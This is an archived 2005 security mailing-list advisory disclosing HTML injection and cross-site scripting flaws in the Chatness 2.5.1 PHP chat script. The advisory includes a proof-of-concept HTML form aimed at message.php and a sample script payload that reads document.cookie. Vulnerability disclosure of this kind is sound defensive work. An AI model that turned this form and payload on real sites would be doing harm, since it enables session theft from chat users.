Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[PersianHacker.NET 200503-12]Chatness 2.5.1 and prior XSS Vulnerabili

from [PersianHacker Team] Network Security [Permanent Link]
Subject: [PersianHacker.NET 200503-12]Chatness 2.5.1 and prior XSS Vulnerabilities
Date: 29 Mar 2005 14:07:42 -0000 


[PersianHacker.NET 200503-12]Chatness 2.5.1 and prior Html Injection 
Vulnerability
Date: 2005 March
Bug Number: 12

Chatness
Chatness is a PHP based chat script.It has enough flexibility to fit any users 
needs, and enough modification options to customly fit into any site
http://www.chatness.us

Discussion:
--------------------
Html Injection & Cross-Site Scripting
The script does not properly validate user-supplied input in the 'user' field. 
A remote user can create specially crafted HTML that, when loaded by the target 
user, will cause arbitrary scripting code to be executed by the target user's 
browser.
Also 'message' field in "message.php"

Exploit:
--------------------
<html>

<head>
<title>Chatness 2.5.1 Html Injection Exploit</title>
</head>

<body>

<h1>Chatness 2.5.1 Html Injection Exploit</h1>


<form method="POST" action="http://www.example.com/message.php";>
  <b>XSS in message.php:</b><p>
  Username:
  <input type="text" name="message" size="48" value="XSS Injection Code"></p>
  <p>
<br>
  example: &lt;script&gt;document.write(document.cookie)&lt;/script&gt;</p>
  <p>&nbsp;<input type='submit' name='login' value='RUN!' class='button'></p>
</form>
<p>&nbsp;</p>
<p align="center"><a 
href="http://www.PersianHacker.NET";>www.PersianHacker.NET</a></p>

</body>

</html>


Solution:
--------------------
Edit the source code to ensure that input is properly sanitised.


Credit:
--------------------
Discovered by PersianHacker.NET Security Team
by 3nitro (3nitro[@]persianhacker[.]net)
http://www.PersianHacker.NET

Special Thanks: Pi3cH


Help
--------------------
visit: http://www.PersianHacker.NET
or mail me @: 3nitro[@]persianhacker[.]net


Note
--------------------
script authors contacted for this vulnerablility.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [PersianHacker.NET 200503-12]Chatness 2.5.1 and prior XSS Vulnerabilities, PersianHacker Team <=
Previous by Date:  Re: Security Flaw with Digital signatures in Microsoft Outlook, dori
Next by Date:  RE: Multiple Sql injection, and multiple XSS vulnerabilities in Photopost PHP Pro Photo Gallery Software., GulfTech Security Research
Previous by Thread:  [SECURITY] [DSA 697-1] New netkit-telnet packages fix arbitrary code execution, Martin Schulze
Next by Thread:  [Full-disclosure] Hacked: Who Else Is Using Your Computer?, Paul Laudanski
Indexes:  [Date] [Thread] [Top] [All Lists]